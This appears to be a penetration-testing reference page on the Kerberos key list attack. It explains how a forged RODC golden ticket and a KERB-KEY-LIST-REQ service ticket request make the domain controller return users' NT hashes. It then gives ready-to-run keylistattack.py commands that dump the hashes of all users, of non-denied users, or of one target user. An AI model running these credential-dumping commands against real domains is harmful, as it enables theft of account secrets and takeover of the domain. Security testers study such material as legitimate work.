Kerberos key list
Theory
It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ
(service ticket request) to the KRBTGT
service with a KERB-KEY-LIST-REQ
message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources.
An attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ
to the KRBTGT
service with a padata
filed value of 161 (KERB-KEY-LIST-REQ
). Knowing the KRBTGT
key of the RODC is required here. The TGS-REP
will contain the long term secret of the user in the KERB-KEY-LIST-REP
key value.
Practice
From UNIX-like systems, the keylistattack.py tool (Python) can be used for this purpose.
#Attempt to dump all the users' hashes even the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -full "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"
#Attempt to dump all the users' hashes but filter the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"
#Attempt to dump a specific user's hash
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -t "$TARGETUSER" -kdc "$RODC_FQDN" LIST